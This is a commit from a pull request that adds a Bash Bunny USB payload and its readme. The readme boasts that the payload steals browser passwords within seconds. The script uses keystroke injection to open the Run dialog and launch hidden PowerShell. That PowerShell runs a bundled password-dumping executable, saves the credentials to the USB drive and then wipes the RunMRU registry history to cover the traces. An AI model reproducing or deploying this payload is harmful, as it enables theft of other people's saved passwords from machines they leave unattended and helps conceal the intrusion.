pull/80/merge
washplant26 2024-11-04 12:37:57 +01:00 committed by GitHub
commit 23c2331adb
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 18 additions and 0 deletions

View File

@ -0,0 +1,10 @@
Author Justin Hynes credit: Darren Kitchen and www.nirsoft.net
This allows you to get passwords from browers within seconds!
This is my very first payload and I have tested it on the new bash bunny and so far it works without a problem
There is few thing you need though in order to have this payload working 1 you need the name your bash bunny uf
so that the passwords get saved to the correct place.
2 You need to put the s.exe(very important that you keep it that name) in the home directory of the bash bunny
The payload must be in switch 1 or switch 2 but the s.exe software must be put in the home directory
Well that is it. Thanks Darren Kitchen and Shannon Morese for all of the youtube videos. :) very helpful.

View File

@ -0,0 +1,8 @@
LED R 100
ATTACKMODE HID STORAGE
QUACK DELAY 1000
QUACK GUI r
QUACK DELAY 75
QUACK STRING "powershell -windowstyle hidden "'$D'" =Get-WMIObject Win32_Volume | ? { "'$_.Label'" -eq 'uf' } | select name;cd "'$D.name'";./s /stext p;Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
QUACK ENTER
LED G

Binary file not shown.